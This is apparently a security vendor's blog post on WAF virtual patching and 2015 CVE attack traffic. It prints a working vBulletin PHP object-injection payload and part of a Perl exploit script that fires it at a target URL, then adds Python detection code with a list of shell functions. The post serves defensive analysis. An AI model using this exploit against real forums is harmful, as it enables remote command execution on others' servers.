Virtual patching may have had its humble beginnings when IPS devices first reaped its benefits; today it is even more valuable in the fight against zero-day attacks on web applications. We are going to take a deeper look at how Imperva SecureSphere WAF virtual patching protects web applications in the real world.
We did an extensive analysis of the CVEs in the blocked alerts for the first two weeks of December, following the CVE disclosures and the immediate mitigation that was subsequently deployed on Imperva SecureSphere WAF.
| CVE description | Blocked events | Distinct server groups |
|---|---|---|
| CVE-2015-5227: WordPress Landing Pages Plugin Remote Command Execution | 1931 | 35 |
| CVE-2015-1398: Magento Shoplift Vulnerability | 1740 | 159 |
| CVE-2015-7808 vBulletin PHP object injection | 1561 | 109 |
| CVE-2015-1635: Microsoft HTTP.sys DoS | 322 | 18 |
| CVE-2015-4455 Gravity Forms WordPress File Upload | 203 | 6 |
| CVE-2015-4455 Aviary Image Editor file upload | 203 | 6 |
| CVE-2015-2825: WordPress Simple Ads Manager plugin File Upload | 146 | 15 |
| MS15-034/CVE-2015-1635 Attacking Windows Webservers | 92 | 10 |
| MS15-034/CVE-2015-1635 Attacking Windows Webservers 2 | 92 | 10 |
| CVE-2015-4133: ReFlex Gallery WordPress plugin File Upload | 86 | 16 |
| CVE-2015-2208: phpMoAdmin Remote Command Execution | 37 | 13 |
| CVE-2015-5461: WordPress StageShow Open Redirect | 24 | 6 |
| CVE-2015-1635: Microsoft HTTP.sys DoS_user_defined | 14 | 1 |
| CVE-2015-1635: Microsoft HTTP.sys DoS – SOC | 14 | 1 |
| CVE-2015-4852: Apache Commons and Oracle WebLogic Remote Command Execution – 5 | 9 | 1 |
| CVE-2015-4852 Deserialization vulnerability 8 | 9 | 1 |
| CVE-2015-4134: phpwind Open Redirect | 7 | 1 |
| CVE-2015-4553: DedeCMS Unrestricted File Upload – 1 | 4 | 1 |
| CVE-2015-6914: SiteFactory CMS Absolute Path Traversal-2 | 3 | 1 |
| Malformed URL rketing-treng/2015-top-digital-marketing-trends-infographic-recap/ | 2 | 1 |
| CVE-2015-1587: Maarch File Upload | 2 | 1 |
| CVE-2015-4852 Deserialization vulnerability smd.jsp 1 Detection Only | 2 | 2 |
| CVE-2015-5471: WordPress Swim Team Plugin Path Traversal | 1 | 1 |
| CVE-2015-5609: WordPress Image Export Plugin Path Traversal | 1 | 1 |
| Grand Total | 6505 | 416 |
CVE-2015-5227 (row 1) is a WordPress remote code execution vulnerability that attackers tried to exploit and that Imperva clearly blocked. In most cases customers also use dynamic profiling and deploy a positive security model, so any anomalous access is blocked automatically even before the ADC content update arrives. The continuous updates from the Imperva ADC ensure immediate protection against such high-profile CVEs.
The more interesting entry is CVE-2015-7808, vBulletin PHP object injection, where we first suspected a false positive given the high number of hits and server groups. We put on our detective hats, got out our magnifying glasses and analyzed the payloads from these events further.
The majority of events used the following payload (extracted from our community defense data):

```
O:12:"vB_dB_Result":2:{s:5:" * db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:" * recordset";s:20:"echo $((0xfee10000))";}
```

It was no accident that this snippet matches the following piece of code from pastebin. The complete listing can be found at http://pastebin.com/r3PgT4Yh:
```perl
use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent->new;
print "\n\t Enter Target [ Example:http://target.com/forum/ ]";
print "\n\n\t Enter Target : ";
$Target = <STDIN>;
chomp($Target);
$response = $ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}');
```
We can clearly see that the `echo $((0xfee10000))` marker we identified is carried inside a PHP object injection: the serialized `vB_Database` object maps its `free_result` function to `system`, and the `recordset` string holds the command.
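To show how events of this kind can be triaged from web-server or WAF logs outside the product, here is an added Python example (not Imperva's code and not taken from the pastebin script) that URL-decodes the `arguments` parameter of constructed `decodeArguments` requests and flags the object-injection shape seen above: a serialized `vB_Database` whose `free_result` hook is bound to a shell function, the command carried in `recordset`, and the `echo $((0x…))` marker. The sample requests, the function list and the field names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample request URIs (not taken from the page's data). The first
# mirrors the shape of the payload discussed above; the other two are benign.
SAMPLE_REQUESTS = [
    "/forum/ajax/api/hook/decodeArguments?arguments=O:12:%22vB_dB_Result%22:2:"
    "{s:5:%22%00*%00db%22;O:11:%22vB_Database%22:1:{s:9:%22functions%22;a:1:"
    "{s:11:%22free_result%22;s:6:%22system%22;}}s:12:%22%00*%00recordset%22;"
    "s:20:%22echo%20$((0xfee10000))%22;}",
    "/forum/ajax/api/hook/decodeArguments?arguments=a:1:{i:0;s:5:%22hello%22;}",
    "/forum/showthread.php?t=42",
]

SHELL_FUNCS = {"system", "exec", "passthru", "shell_exec", "popen", "proc_open"}
OBJ_RE = re.compile(r'O:\d+:"([A-Za-z0-9_\\]+)"')            # serialized PHP objects
HOOK_RE = re.compile(r's:\d+:"free_result";s:\d+:"(\w+)"')  # free_result -> callable
RECORDSET_RE = re.compile(r's:\d+:"\x00\*\x00recordset";s:(\d+):"')  # NULs restored
MARKER_RE = re.compile(r'echo \$\(\(0x[0-9a-fA-F]+\)\)')    # scanner marker

def arguments_param(uri):
    """Return the URL-decoded `arguments` query value; %00 becomes a real NUL."""
    for pair in urlsplit(uri).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "arguments":
            return unquote(value)
    return ""

def analyze_request(uri):
    """Inspect one request; return a findings dict, or None if no object is injected."""
    args = arguments_param(uri)
    classes = OBJ_RE.findall(args)
    if not classes:
        return None
    finding = {"classes": classes, "shell_func": None, "command": None, "marker": False}
    hook = HOOK_RE.search(args)
    if hook and hook.group(1) in SHELL_FUNCS:
        finding["shell_func"] = hook.group(1)
    rs = RECORDSET_RE.search(args)
    if rs:  # honour the declared string length so the command is taken verbatim
        finding["command"] = args[rs.end():rs.end() + int(rs.group(1))]
    finding["marker"] = bool(MARKER_RE.search(args))
    return finding

def scan_log(uris):
    """Return (uri, finding) pairs for every request that carries an injected object."""
    hits = []
    for uri in uris:
        finding = analyze_request(uri)
        if finding:
            hits.append((uri, finding))
    return hits
```

Decoding `%00` before matching matters: the property names are `\0*\0db` and `\0*\0recordset` (protected-member encoding), so a rule written against the raw URL or against the space-mangled copy of the payload would miss them.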
Vulnerabilities always exist in software; what we constantly notice is how quickly the frequency of attacks increases from the time a CVE is published. The Imperva ADC team works round the clock to keep abreast of vulnerabilities via both official and ad hoc channels, and quickly publishes mitigations that take into account the severity of each CVE. Virtual patching is fundamentally important to containing zero-day attacks, because it deploys mitigations quickly without needing to update the server software. In this never-ending game of cat and mouse, the Imperva ADC team is providing the edge and helping our customers stay protected.